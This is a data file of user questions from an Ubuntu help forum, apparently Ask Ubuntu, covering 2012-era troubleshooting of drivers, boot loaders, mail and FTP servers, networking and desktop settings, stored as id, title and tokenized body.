239180	how to make a new-defined alphabetic sort order in a locale work ?	i 'm working on a new latin-based script for persian . so i 've used such lines in gb locale file , to modify the sort order : first of all , i 've introduced the new characters in such way : collating-symbol < acirc > then , defined the order : reorder-after < a > < acirc > and , finally the unicode : reorder-after < u0041 > < u00c2 > < acirc > ; < cir > ; < cap > ; ignore % ă but , after i save the file , and run the command sudo dpkg-reconfigure locales , nothing is changed , and the applications such as text editor or libreoffice writer do n't obbey the new-defined order . should i do more to introduce this new sort order to apps ?
239186	why am i unable to see a folder in a ntfs formated drive	i am running ubuntu 12.04 . my problem : in a ntfs formatted disk i have created one folder and stored some files . now it is showing nothing in that drive . but if i check the size of the disk there is still some space used . how can i get into that folder now .
239187	how to create chrome/chromium web application desktop shortcut ?	i 'm not able to create desktop/unity short cut for web applications using chromium/google chrome web browser in ubuntu 12.10 .
239188	is it possible for emacs to appear on right side of the desktop area when invoking it from the command line ?	my standard programming mode is to have a bash shell open on the left side of my desktop and to have emacs open on the right side . however , when i type emacs `` filename '' in to my shell , it comes up on the left side by default . anyway i can change this ? thanks !
239189	how can i set up a bluetooth mouse without using a mouse ?	i have a mac mini with an apple magic mouse bluetooth mouse . in order to set up a bluetooth mouse , though , it looks like you have to use a mouse . does n't that completely defeat the purpose ? is there a way i can set up my bluetooth mouse using the commandline ?
239194	what is the best multi-account twitter client ?	i used gwibber in the past to follow two twitter accounts i have . to distinguish between the two , it was possible to assign a different colour to each account . now i 'm trying to use gwibber again but the colour assign feature seems gone . instead tweets are marked with a tiny twitter icon on the right only when you hover to the right of a post . unfortunately the icon is the same for both accounts . so my real question is : how do i distinguish posts in one twitter feed from the other ? if gwibber can not do that any longer , is there a different twitter client that can do the trick ?
239195	ati r7850 w. opencl support on 12.04+	preface i have downloaded the latest amd/ati drivers for my radeon hd 7850 and i am having a difficult time getting it to work with ati stream sdk 2.1 . i have tried purging fglrx and installing from debs created from the catalyst installation script . i have also tried simply installing directly from the script , vs generating and installing .debs . after every installation , i run sudo aticonfig -- initial -- nobackup and then reboot my system . problem the problem i am having is that fglrxinfo is giving me this error : error : unable to open display ( null ) . i have run fglrxinfo with my display variable set to both :0.0 and :0 with no success . also , display=:0.0 ./clinfo only returns my cpu and no gpu . my goal is to install my graphics card and have it shown in clinfo so that i can use it for opencl . system information $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati device [ 1002:6819 ] $ uname -a linux ubuntu-12.04 3.2.0-35-generic # 55-ubuntu smp wed dec 5 17:42:16 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection ubuntu 12.04 ( server ) references bitcoin mining and ubuntu 10-10 ati radeon 5xxx ubuntu 11.04 natty 64bit headless bitcoin mining with ati 11.5 binary driver purging and installing fglrx
239197	is the atom z2460 supported ?	could n't find anything in the component database , i 'm mostly worried about the powervr gpu it has . there are many windows tablets using it and i was wondering if i could use 12.04 on it
239201	make ubuntu usb bootable on windows	i know there are a lot of tools to create a bootable usb for ubuntu with windows . but i 'm sure , that there was a possibility in the ubuntu installation directory . i used it some time ago , but i ca n't find it anymore : ( i think it was a .exe , or a .bat , any case a cmd window has opened , some things were executing and the usb was bootable . and it was in the ubuntu directory ! is there still the possibility to do that ? does that file exist ? i unfortunately ca n't remember .
239206	wireless usb detection problem	i have a dell inspiron 15r running ubuntu 12.04 lts 64-bit , and a logitech m705 wireless mouse . the laptop has 3 usb ports ; left , right , and back . when the mouse dongle is plugged in to the back or left ubs port on startup it works fine . when plugged into the right it does n't . if i start up with the dongle disconnected and try to plug it in to any port , it works on all except the right one . once the mouse is working on the left or back , if i disconnect the dongle and place it in the right usb port , the right one works ! however , if i reboot it stops working again until i repeat the process . any thoughts ?
239209	no sound from bluetooth headset , but its detected	i have an bluetooth headset connected to my computer , the buttons play/pause/volume are working fine , but i have no sound in the headset , but in the speaker of the computer . in fact i played with the sound settings of my headset in the sound settings of ubuntu , and after choosing `` switch off '' , the headset did `` disapear '' from the settings . my question is , how can i make it appear there again , to be able to hear the sound via the headset ? thank you all for help .
239213	postfix will not receive emails	my postfix setup does not receive emails from anywhere other than the localhost ( sendmail ) . i can log in and send emails from my server , but nothing comes in . here is my postconf -n alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix content_filter = amavis : [ 127.0.0.1 ] :10024 disable_vrfy_command = yes inet_interfaces = all mailbox_size_limit = 0 message_size_limit = 0 mydestination = mydomain = dangersalad.com mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mynetworks_style = host myorigin = /etc/mailname readme_directory = no receive_override_options = no_address_mappings recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtp_use_tls = yes smtpd_banner = $ myhostname esmtp $ mail_name smtpd_delay_reject = yes smtpd_helo_required = yes smtpd_recipient_restrictions = permit_sasl_authenticated , permit_mynetworks , reject smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = smtpd_sasl_security_options = noanonymous smtpd_sender_restrictions = permit_sasl_authenticated , permit_mynetworks , reject smtpd_tls_cert_file = /etc/ssl/private/mail.mydomain.com.crt smtpd_tls_key_file = /etc/ssl/private/mail.mydomain.com.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes virtual_alias_maps = mysql : /etc/postfix/maps/alias.cf virtual_gid_maps = static:5000 virtual_mailbox_base = /var/spool/mail/virtual virtual_mailbox_domains = mysql : /etc/postfix/maps/domain.cf virtual_mailbox_limit = 0 virtual_mailbox_maps = mysql : /etc/postfix/maps/user.cf virtual_uid_maps = static:5000 and here is the error in the log jan 9 19:14:06 mail postfix/smtpd [ 2389 ] : connect from mail-ie0-f171.google.com [ 209.85.223.171 ] jan 9 19:14:07 mail postfix/smtpd [ 2389 ] : noqueue : reject : rcpt from mail-ie0-f171.google.com [ 209.85.223.171 ] : 554 5.7.1 < paul.dangersalad @ gmail.com > : sender address rejected : access denied ; from= < paul.dangersalad @ gmail.com > to= < paul @ dangersalad.com > proto=esmtp helo= < mail-ie0-f171.google.com > jan 9 19:14:07 mail postfix/smtpd [ 2389 ] : disconnect from mail-ie0-f171.google.com [ 209.85.223.171 ] any advice ?
239216	bcm4311 wireless driver will not work on any ubuntu distro 's past 10.10 , and i can not figure out why	i installed ubuntu 10.10 onto an older dell latitude d520 ( it 's the only disc i had till i connected to the net , and grabbed the newest distro ) and the wireless drivers installed and connected just fine . i first tried the easy route ( upgrading to 12.10 through update manager ) but it errored out and would not let me update/upgrade . so i just downloaded the iso and tried to install it via disc . but this time , the wireless will just not work for me . ( after much diligence ) i finally found the new software center that contains the additional drivers program . it says that i am using the broadcom 802.11 linux sta wireless driver source from bcmwl-kernal-source ( proprietary ) . but my wireless light will not turn on after hitting the `` fn+wireless button '' and in my network finder it only says `` wired network - disconnected '' it does n't list anything about wireless . it does n't say `` wireless disabled '' or `` wireless disconnected '' . it just shows status for wired connections . i 've tried this with 12.10 , 12.04 , 11.10 , 11.04 , and 10.10 is the latest distro that allows me to use wireless . and because it 's so out of date , it will not update/upgrade at all . my other major setback , is i do not have any ethernet at my disposal at the moment . i can not connect to my router aside from my wireless signal . so updating my repositories does n't work either . if there is anything i can do , i would love to know . i am fairly computer savvy , but most of my skill is in windows . thanks in advance .
239218	how can i get the public key for ubuntu 10.04 update manager ?	update manager fails with a dialog box that says w : gpg error : http : //ppa.launchpad.net lucid release : the following signatures could n't be verified because the public key is not available : no_pubkey 5126890cdcc7afe0 i have tried a few `` solutions '' to this . the next step is always to add a key to the keyring . whenever i try ~ $ gpg -- keyserver pgpkeys.mit.edu -- recv-key 5126890cdcc7afe0 gpg : requesting key dcc7afe0 from hkp server pgpkeys.mit.edu gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 ~ $ gpg -- keyserver keyserver.ubuntu.com -- recv-key 5126890cdcc7afe0 gpg : requesting key dcc7afe0 from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 that , i get the error message http fetch error 7 : could n't connect to host this error seems to be associated with connecting to the internet through a proxy server . however , i am connected directly to the internet . what am i missing ? thanks fred
239219	getting qt5 to work with the `` create a currency converter phone app '' -tutorial	i 'm trying to get into developing for the ubuntu phone , and i 'm following the create a currency converter phone app tutorial by the letter . problem is that when i try to preview the app , i get a small white window with nothing happening . i would have posted a screendump , but i am not allowed by the system yet . i have researched a bit and read that i need to set the path to the viewer in options- > environment- > external tools to the path opt/qt5/bin/qmlscene . this i have done . unfortunantly , no change . i still can not get anything , when previewing . can anyone please help me set it up ? thank you in advance .
239223	resize vnc screen	i would like to be able to resize a vnc session , where the ubuntu 12.10 server is running with the default vnc server by selecting `` allow other users to view your desktop '' and `` allow other users to control your desktop '' under desktop sharing preferences . i access this from ultravncviewer on windows , and under 12.04 , i was able to use xrandr -fb 1550x800 to resize the screen but the behaviour seems to have changed in 12.10 which changes the scaling to be incorrect . i would like to try the suggestion here however i need to know where the vnc4server is started in the ubuntu 12.10 boot sequence to add the required switches to the vncserver start-up . where is this started up , and is it safe to make changes to that start-up script , or is it better left alone to avoid breaking other stuff ? many thanks .
239229	the command 'which cd ' prints nothing in 12.04	the command which cd prints nothing . same for whatis cd and whereis cd . how can i find out if cd is an alias , function , or bash built-in ? i 'm using ubuntu 12.04 .
239236	my tv can not connect to media server service on windows7 ( dnla )	thanks to this article sharing connection to other pcs ( via wired ethernet ) i am able to connect my tv to the internet . but my tv is not able to connect to wms windows media server running on other pc 's in my home network . i would suspect that a 'normal ' bridge simply forward packages . but it looks like my tv , connected through a laptop running ubuntu 12.04 lts , can not see the media server service on my windows7 dekstop . has anyone suggestions how to check the settings , or even how to make the connection work ? thanks to the comments , the problem seems to be that my tv is on another subnet than my laptop and dlna-server . how can i configure my settings on the laptop , so my tv gets on the same subnet ?
239239	500 oops : vsftpd : refusing to run with writable root inside chroot ( ) keep user jailed	before you close this out to repetition , i have been researching all of the proposed solutions to this bug and so far i have been unable to keep a ftp user jailed to their website directory . while i am not a ubuntu server expert , i wanted to reach out to the community to see if anyone has found a solution that both fixes this bug and keeps the user jailed to their directory . my vsftpd settings that i changed : listen_port=9000 set : anonymous_enable=no uncomment : â local_enable=yes uncomment : write_enable=yes uncomment : local_umask=022 set : connect_from_port_20=no uncomment : idle_session_timeout=600 uncomment : data_connection_timeout=120 comment out : # ftpd_banner=welcome to blah ftp service . [ should be on line 104 ] added : banner_file=/etc/issue.net uncomment : chroot_local_user=yes uncomment : chroot_local_user=yes uncomment : chroot_list_enable=yes uncomment : chroot_list_file=/etc/vsftpd.chroot_list at the end of the file i added : # show hidden files and the `` . '' and `` .. '' folders . # useful to not write over hidden files : force_dot_files=yes # hide the info about the owner ( user and group ) of the files . hide_ids=yes # connection limit for each ip : max_per_ip=10 # maximum number of clients : max_clients=5 # ftp passive settings pasv_enable=yes # if your listen_port is 9000 set this range to 7500 and 8500 pasv_min_port= [ port range min ] pasv_max_port= [ port range max ] the user in question mybloguser is jailed to her website directory under /srv/www/myblog and this user is not part of the nano /etc/vsftpd.chroot_list file . the userâs home directory is also /srv/www/myblog which used to work in the past . i tried the allow_writeable_chroot=yes solution which did not work , and actually broke vsftpd completely . i have tried : http : //www.benscobie.com/fixing-500-oops-vsftpd-refusing-to-run-with-writable-root-inside-chroot vsftpd stopped working after update http : //programster.blogspot.com/2012/12/ubuntu-1204-setting-up-ftp-server-with.html http : //imbuzu.wordpress.com/2012/05/07/fixing-500-oops-vsftpd-refusing-to-run-with-writable-root-inside-chroot-on-vsftpd/ how can we both fix this error and keep the user jailed to their home directory ?
239245	`` /ubuntu/winboot/wubildr.mbr '' error	i am having some problems with my new laptop asus n76vm . i have read up on the problem for the past couple of days , as it seem to be uefi related . first , i tried to use the wubi installer and since then it seems to have left some sort of boot setup behind . at every boot , even after formatting the partition i created for my ubuntu install , i get to choose between windows 7 or ubuntu , but no matter what , if i choose to boot in ubuntu i get a /ubuntu/winboot/wubildr.mbr error . the wubi failed due to the uefi problem , my bios holds no setup to disable the efi protocol , so after a while i tried to install the x64 12.10 version from the liveusb stick , and chose to boot in uefi usb mode . this installed just fine for the first time , but on boot i still get the choice between ubuntu and windows 7 , but when booting into ubuntu , i get the /ubuntu/winboot/wubildr.mbr error right away . since the /ubuntu/winboot/wubildr.mbr error shows up along with the choice of booting into ubuntu . even when nothing should be installed except windows 7 , i would think that the wubi installer have messed something up in the bootloader . anyone has any good ideas ?
239247	unity really slow on radeon 6950	i was wondering if anyone could tell me what i need to do/if my system should be able to run ubuntu 12.10 smoothly . asus sabertooth x58 , i7 3.2ghz , 12 gb 1600 ddr3 , x2 hd radeon 6950 2gb , 2tb 7200rpm hdd , 850w psu i 'm pretty sure it should be able to run the os smoothly.. even if its the most resource intensive . but its performing poorly in fact its probably performing worse than my satellite pro c660 but then i have n't actually tested . iâve downloaded and switched to the classic gnome desktop so that it 'll run smoothly ( tried the fancy gnome but due to duel screens it made go really weird ) so anyone any suggestions on how to increase system performance ? if not can anyone suggest any 'pretty ' gui setup that supports duel screens and has a dock ? many thanks
239250	starting lemp server at startup	based on this blog post i 've installed lemp server . is there any easy way to add this web server : php-fpm , nginx , mysql into startup applications list ?
239252	setup with bios but gpt partition table ( due to 3 tb disk ) ?	how can i use a disk with gpt partition table on a system with a bios but no ( u ) efi ? i have a system with a 3 tb drive ( no other drives and since this is a remote machine i have no choices here ) and with a gpt for obvious reasons . ubuntu 12.04 is being bootstrapped onto the system and this worked so far . now after bind-mounting /dev , /proc and /sys from the host into the target system and chrooting into it , i installed linux-image-server which worked fine ( after linking /sbin/initctl as /bin/true ) . because this is a remote machine i have to do all of this via ssh and have no bootable cd or anything . i can boot into a rescue system if it fails , though ( pxe ) . now i know that grub2 is supposed to support the scenario , but for the life of me i can not figure out how to install it . the boot ( and root ) device is to be /dev/md0 , composed of /dev/sda1 and /dev/sdb1 in raid mode 0 . with /dev/md0 mounted under /target i am running : grub-install -- root-directory=/target -- no-floppy /dev/sda which fails with : /usr/sbin/grub-setup : warn : this gpt partition label has no bios boot partition ; embedding wo n't be possible ! . /usr/sbin/grub-setup : error : embedding is not possible , but this is required when the root device is on a raid array or lvm volume . so how can i get grub2 installed in order to have this bios-based system boot properly ? note : it does n't matter whether i run this inside or outside the chroot environment . the error and output are identical . likely because i bind-mounted /dev etc into place . of course appropriate adjustments to the command line ( no -- root-directory= ) have been made .
239258	update manager does n't allow me to upgrade from version 10.10 to 12.10	hi i 'm trying to upgrade my old version 10 of ubuntu to the latest version 12. when i open update manager i get dialogue box with `` your ubuntu release is not supported anymore '' and the update manager indicates it is `` building data structures '' but never seems to progress any further and if i close the dialogue box which tells me it is no loger supported the update manager closes as well . i 'm no geek how do i upgrade to a version 12 . scott
239260	got an error , while i was trying to instal ubuntu/windows installer	an error occurred got an error , while i was trying to instal ubuntu/windows installer . windows7-home premium ( 64-bit ) sony/vio laptop e series .
239263	every time i restart my computer , an app i use ( synergy ) disappears . running ubuntu 12.04	if i log in and out or if i restart my computer , synergy always disappears . i was using the pc a few days ago , got synergy installed and running , and then i rebooted . synergy did n't start up and i could find it in applications or recent or even by searching the dash . when i tried to install it using ubuntu software center , it shows already installed . so i removed it , reinstalled it and it started working again . at this point i also set it to load on startup through synergy settings and also by clicking the gear in the top right and startup applications ... i rebooted again and it 's gone again . it 's also missing from startup applications and also from the dash search . i still see in /usr/bin/ synergyc , synergyd , and synergys but none of them run if i double click them ( or right-click- > open ) . can someone please help me with this ?
239265	incomplete system-wide proxy settings on ubuntu 12.10	the new : system settings > network > network proxy does not allow me to configure the user and password for my proxy , and it is missing the ignore host list feature . i do n't accept `` edit /etc/apt/apt.conf '' as an answer , this is only to apt . i want to use the `` apply system wide '' feature under the proxy settings , as any normal user should do . i though ubuntu was supposed to be user friendly .
239269	turn on numlock at startup	after some research i kinda found some answer http : //askubuntu.com/a/155683/119087 . for example this answer does n't worked for me http : //askubuntu.com/a/130213/119087 i 'm using usb keyboard . is there any possible way to turn numlock on via system preferences without any package or something else at system startup ?
239270	gparted taking forever	i 'm trying to install ubuntu 12.10 from dvd . every time i try , i get an i/o error . i 've tried replacing the ram , with no change . i decided i 'd try to create a clean hd by booting into livecd and then running gparted . however -- gparted just runs with the `` scanning all devices '' message forever -- though running fdisk -l from the terminal does find the drive fine . any thoughts on what 's going on ?
239278	how long will ubuntu 13.04 be supported for ?	i am trying to find out how long will ubuntu 13.04 be supported before the next version arrives .
239279	ubuntu/kubuntu 12.10 and nvidia optimus which drivers to use	o.k . there is a mountain of information out there that i can find of particular help is this thread : how well do laptops with nvidia optimus work ? the hardware i 'm trying to install on is an alienware m11x r2 ( slightly old running an gt335m as its discrete gpu with an i3 processor ) . but i 'm a little confused and have a couple of questions : should i use bumblebee if i 'm installing 12.10 or will the noveau driver be sufficient ? how do i verify ( other than warming my coffee on the gpu ) that the optimus stuff is working ? can i use cuda with nouveau drivers ? why are graphics drivers for linux such a difficulty . ( the amd desktop drivers ) the last question was rhetorical .
239281	software center freezes in ubuntu 12.04 , how can i fix it ?	every time i open it up it freezes . i 'm going to try to re-install it . still , anyway to fix this ? thank you for your time . pf : still learning how to use ubuntu so sorry if i 'm not being descriptive enough .
239289	ubuntu kernel not present ?	when i launch and attempt to boot ubuntu through the windows boot manager , it takes me to a grub prompt , and when i try to execute the 'boot ' command , it says there is not kernel selected . i installed ubuntu via the windows installer , any ideas ?
239290	is there a way to convert old unix scribe documents ?	under unix there was a typesetting utility called 'scribe ' that would produce typesetting for documents . i have an old file from this that i need to update to some readable format . i can run any linux flavor , or mac or windows , i am just trying to find a way to convert this , even if it means tracking down a copy of the old scribe source code .
239293	can not authenticate in gnome to install packages	i can not install anything through 'ubuntu software center ' . the system refuse to accept the su password that it accepts in terminal . it might be relevant that i 've had change the user 's password a while ago but do not remember the old password . also i have added the user as a sudoer in /etc/sudoers . please notice that i have this authentication problem only in gnome , where i get your authentication attempt was unsuccessful . please try again . whenever i enter my user password in the authentication window . i can use the very same password of the same user to install the package from terminal . so basically i 'm limited to terminal for all my root activity . how can i resolve this annoying problem ? thanks
239303	can not install eclipse due to broken packages	trying to install eclipse , i get the following error : xxx : ~ $ sudo apt-get install eclipse reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : eclipse : depends : eclipse-jdt ( > = 3.8.0~rc4-1ubuntu1 ) but it is not going to be installed depends : eclipse-pde ( > = 3.8.0~rc4-1ubuntu1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have no idea how to solve it . i 'm quite new to ubuntu , but i do n't think that i 'm using a unstable distribution . but i have added the repository which is required to install tomcat7 . could that cause the problem ?
239304	open the dash and search for startup disk creator. , where is the dash	i 'm brand new to ubuntu looking to install it on a flash drive to co-exist with windows 7 on a dell inspirion computer . i 've down loaded ubuntu and the next step i need to take is to `` open the dash and search for startup disk creator . '' after several hours of searching i ca n't locate it . can someone assist ?
239309	i ca n't update ubuntu 2 months now	so when running sudo apt-get update i get errors : err http : //ppa.launchpad.net quantal/main amd64 packages 404 not found err http : //ppa.launchpad.net quantal/main i386 packages 404 not found w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . because of that update manager always popus up message that i should check my internet connection . so what do i do ? how do i remove this packages ? btw the skype problem started from the moment i tried installing skype from usc.. i ended up installing skype by deb file but having this problem from then ... also my etc/apt/sourced.list.d does n't have a skype file or a subfolder.. ubuntu 12.10 here
239313	configure a network card on public ip and wifi usb dongle on lan	i have an ubuntu server running on 12.04.1 lts with the gui installed too . my server has an internal gigabit ethernet card which is configured to serve a web app on a public ip . at this point i did not have any issues . the web app loads perfectly from any computer in the web . i do have the problem that i cant access the internet from the server itself , i open the web browser and does not load , but yet the server is accessible from the web , maybe this is a configuration from my isp , ive been looking for an explanation but still havent found one . maybe here i cant get an appropiate answer . anyways , thats not the real problem . the problem is that i need to load a lot of data to the webapp , and i would like to do it locally through the lan . so i installed a wifi usb dongle . it worked perfectly , now i can get internet on the server and access it locally . but now my public ip wont load the webapp . the usb dongle is connected to a wireless router which has access to the internet . my ethernet card is connected to a switch provided by my isp where i connect my other servers to get a public ip . they gave me the range of ipĺ and told me i just had to configure my server with the public ip i wanted and leave it static , and it worked fine until y installed the usb dongle . here is my configuration on /etc/network/interfaces auto eth0 iface eth0 inet static address 190.109.197. -- - netmask 255.255.255. -- - gateway 190.109.197. -- - i would appreciate your help so much .
239316	/dev/sda is in use -- from livecd	i 'm confused -- i booted from a ubuntu cd and selected the `` try ubuntu '' option . as i understand it , this is the new `` live cd '' style . i then try to check my hdd using fsck and it says that /dev/sda is in use . i think , ok , well let 's unmount it and issue umount /dev/sda/ -- and it says /dev/sda is not mounted . what 's up with that ? i thought that if the disk was unmounted then how could it be in use ? why ca n't i check it ? thanks
239317	how safe to move some system folders into ram ?	here is my pc specs based on this tutorial i made following changeds to fstab tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0 tmpfs /var/tmp tmpfs defaults , noatime , mode=1777 0 0 tmpfs /var/log tmpfs defaults , noatime , mode=0755 0 0 tmpfs /var/log/apt tmpfs defaults , noatime 0 0 now i got some question : will it increase my system 's performance ? how safe it is for my pc ? may some apps like dvd burning tool crash because of big temp space requirement ? ( my swap area is 8 gb as ram ) thx in advance for wasting your time and trying to help
239319	error code 5 when installing	im using a single core 2.8ghz pc with 1gb ram and 400gb harddrive . on installing either 12.10 or 12.04 i get an error code 5 input / output error halfway through the install . i have tried 5 cd 's of different speeds 3 hard drives ( although i want to use the 400gb one ) 2 different cd rom drives and 2 different ide cables . after reading through the forum i have booted ubuntu into `` try it '' mode and accessed the disk utility which confirms the harddrive is healthy . i have unmounted the drive , formatted and remounted , i have also repartitioned the drive . im not doing anything fancy , its a vanilla install and im selecting default options . still getting the same error , its driving me mad .
239320	which file system do i select for sharing files between windows 7 and ubuntu 12.04.1 ?	presently in the install ( usb stick ) for 32-bit ubuntu 12.04.1 . want to have dual-boot capabilities between windows 7 and ubuntu . have partitioned hard drive with windows system ( sda1 ) , windows os ( sda2 ) , ubuntu ( sda3 - with ext4 file system and a `` / '' mount point ) , swap ( sda4 ) and need to know what file system to select for the remaining free space ( storage ) partition with a /home mount point ? i presume it to be either fat32 or ext4 , yet i need to be sure that it enables cross-sharing of documents/directories with both windows 7 and ubuntu operating systems . also , is fat32 an ntfs type of system ? thanks in advance .
239324	how to use wired and wireless interfaces simultaneously ?	when creating any socket , we do n't provide a device name ( like eth0 , or wlan0 ) . on my laptop , i have a wired interface ( eth ) and a wireless interface ( wlan ) . i want to run one process on each interface simultaneously . is it possible ? i 'm using ubuntu 12.10 .
239330	12,10 ubuntu on usb for my thinkpad r50e	i put the ubuntu 12,10 on usb for my thinkpad r50e it s not working on my bios it s say the kemel requires the following features not present on the cpu pae unable to boot .please use a kermel appropriate for your cpu what ineed to do thank you
239338	ubuntu server with desktop or desktop with xampp ?	i 'm building a render farm and wanted to use it like a little server for my home . the main question is : what is better ? install ubuntu server and then install the desktop from apt-get to get an interface or install the desktop edition and then install mysl , php and others ? since the desktop edition has more latency since the 250 interrupts in the kernel and the server edition has only 100 interrupts in the kernel . the server kernel is set to a timer interrupt rate of 100 hz ( config_hz=100 , config_hz_100=y ) , which means it accepts 100 interrupts per second . another way to think of this is the kernel looks up and peers around 100 times per second for something to do . the desktop kernel is set to 250 hz â lower numbers equal lower overhead and higher latency ; higher numbers equal higher overhead and lower latency . higher numbers generally mean the system feels more responsive , at the price of higher cpu usage . some processes require more interrupts ; for example , video processing and voip servers need 1000 hz . if you need to change the hz value it requires a kernel re-compile . more info : the render farm consist in multiple machines . the a master node with hard drive and the other nodes will boot using lan ( pxe ) . have in mind that the main archieve is build a render farm . thanks ! source : http : //www.serverwatch.com/tutorials/article.php/3715071/ubuntu-server -- kernel-configuration-considerations.htm
239343	where is eclipse platform plugin folder ?	today i installed eclipse via sudo apt-get install eclipse-platform . now i need to access the plugins folder and ca n't manage to find it anywhere . i do n't have much experience using ubuntu , so i do n't know if this is trivial but have n't find this information around . thanks !
239347	can i use ntfs for /home	when trying to complete my ubuntu 12.04.1 install i recently received the error message : `` the file system type fat32 can not be mounted on /home , because it is not a fully-functional unix file system . please choose a different file system , such as ext2 . '' is it possible to select the ext4 file system for this /home mount , continue with the full ubuntu install and then change the /home mount to the ntfs file system using the gparted application ? the intent of this partition is to enable file sharing between windows 7 and ubuntu . thanks in advance .
239352	linux default app developed in java	different linux and ubuntu releases have different software included by default -- for example , transmission , firefox , and banshee have all been default applications . as far as i know , most of these applications have been developed using c , or c++ ( vala also ) , or another language that will be compiled into native linux binary files . is there any software which has been developed in java and has become one of ubuntu 's default apps ? ( excluding some ides such as netbeans and eclipse . )
239353	touchpad crashes ( ? ) after 10 minutes hp mini ly931	i am running ubuntu 12.04.1 lts and my touchpad has started crashing after 10 minutes or so . it did n't yesterday . just updated the system . first it behaves erratically then stops movement . usb mouse response is normal . all settings have been changed to other settings multiple times to no avail .
239354	`` no such file '' error when directing output to a file	i am running ubuntu 12.04 . in my accounts .bashrc file i have the line alias ftreport='cd / & & sudo tree > /home/ < user name here > /documents/reports/tree_ $ ( date + % s ) .txt' after typing the command ftreport , i get bash : /home/ < user name here > /documents/reports/tree_ < epoc time here > .txt : no such file or directory the command ftreport must output my system 's file tree in my ~/documents/reports folder with the file title consisting of `` file '' , an underscore , the epoch time , and `` .txt '' . what is wrong and what should it be ?
239360	running ubuntu on usb	i 'm about to install ubuntu onto my thumbdrive , and want to run ubuntu 12.1 from this thumbdrive . i have made a list of steps and would like to know if they 're correct . if any of them are incorrect please correct that step as answer . 1. download ubuntu and save it onto my harddrive as an iso file . i 'm confused about how to save it as an iso . 2 . then turn off my computer and turn it back on . 3 . from the dos menu , press f2 or f12 and tell the computer to boot from the usb . 4. then install linux . i 'm running an asus laptop . with an intel core tm15 it also has windows 8 beta with an option between windows 7. if any of my information is incorrect please tell me . thank you for your kindness and patience
239361	is there a way on ubuntu to keep offline files like in windows ?	in windows there is a option when you browse network folders that copies selected files to local disk . then you can work with those files , create , modify , delete and when you are in the same network as the origin pc those changes are synced . i am talking about 5gb of files , so cloud services are out . this is the scenario : i choose files that i need for 2 weeks . i make then available offline . then i go on a trip , during those two weeks i create new files , delete some files and modify some . i ca n't keep track manually of changes i made . then i return home , log in on my laptop and the files are synced with the file server . then i repeat the process buy with different files this time . is there a way to have this feature in ubuntu ?
239363	fstab smb share not mounting with read write access to windows 8 machine	i am using windows 8 and ubuntu 12.10 and the windows 8 machine is setup as a smb share . i have read through the man page for cifs-mount , but now matter what i try , i can not get the share to give me read and write access to the server . ubuntu will not let me install smbfs as it is obsoleted , so i am unsure where to go from here . the command i am using is //theip/users /media/folder cifs domain=domain , username=user , password=secret , uid=me , rw thank you !
239364	ubuntu 12.10 slow and freezes , loud fan	i installed ubuntu 12.10 64 bit on a custom built desktop , but it runs very slow and often freezes or something like unity will crash . i 'm not sure what the issue is . i tried installing amd drivers ( i 'm using an amd radeon hd 7850 graphics card ) but that seems to have crashed unity and it would never appear again when i restarted the computer . i 'd only get the wallpaper and the cursor and i ca n't fix it afterwards . also my cpu fan is very loud . when i boot into windows , the fan quiets down to a tolerable speed but with ubuntu it never does and in fact it gets louder after a few minutes .
239369	multiple versions of libcurl ?	is it possible to have multiple versions of libcurl installed in ubuntu ? for instance , suppose i have version 1.0 installed , and i download version 1.1 , and install it . is there anyway to keep version 1 , and have several applications use version 1 ?
239371	how do i list folders with underscores first ?	so as pretty much everyone , before using ubuntu i used a windows machine , and one of the things i got used to in windows was to use the underscore as the first character of a folder name as some sort of special marking so that it would be appear first on listing , both in command line and file explorer . for instance , in my ebooks folder ( in windows ) looks something like this : _read book1.pdf book2.pdf _reading book3.pdf book4.pdf book5.pdf but in ubuntu 's nautilus it looks like this : book4.pdf book5.pdf _read book1.pdf book2.pdf _reading book3.pdf what is happening is that it is completely ignoring the underscore and it treats `` _read '' as `` read '' and therefore not listing it in first as wished . i have tried setting the environment variable lc_collate to c. this helps somehow since it lists the underscore together , but at the end , and not at the beginning . thanks .
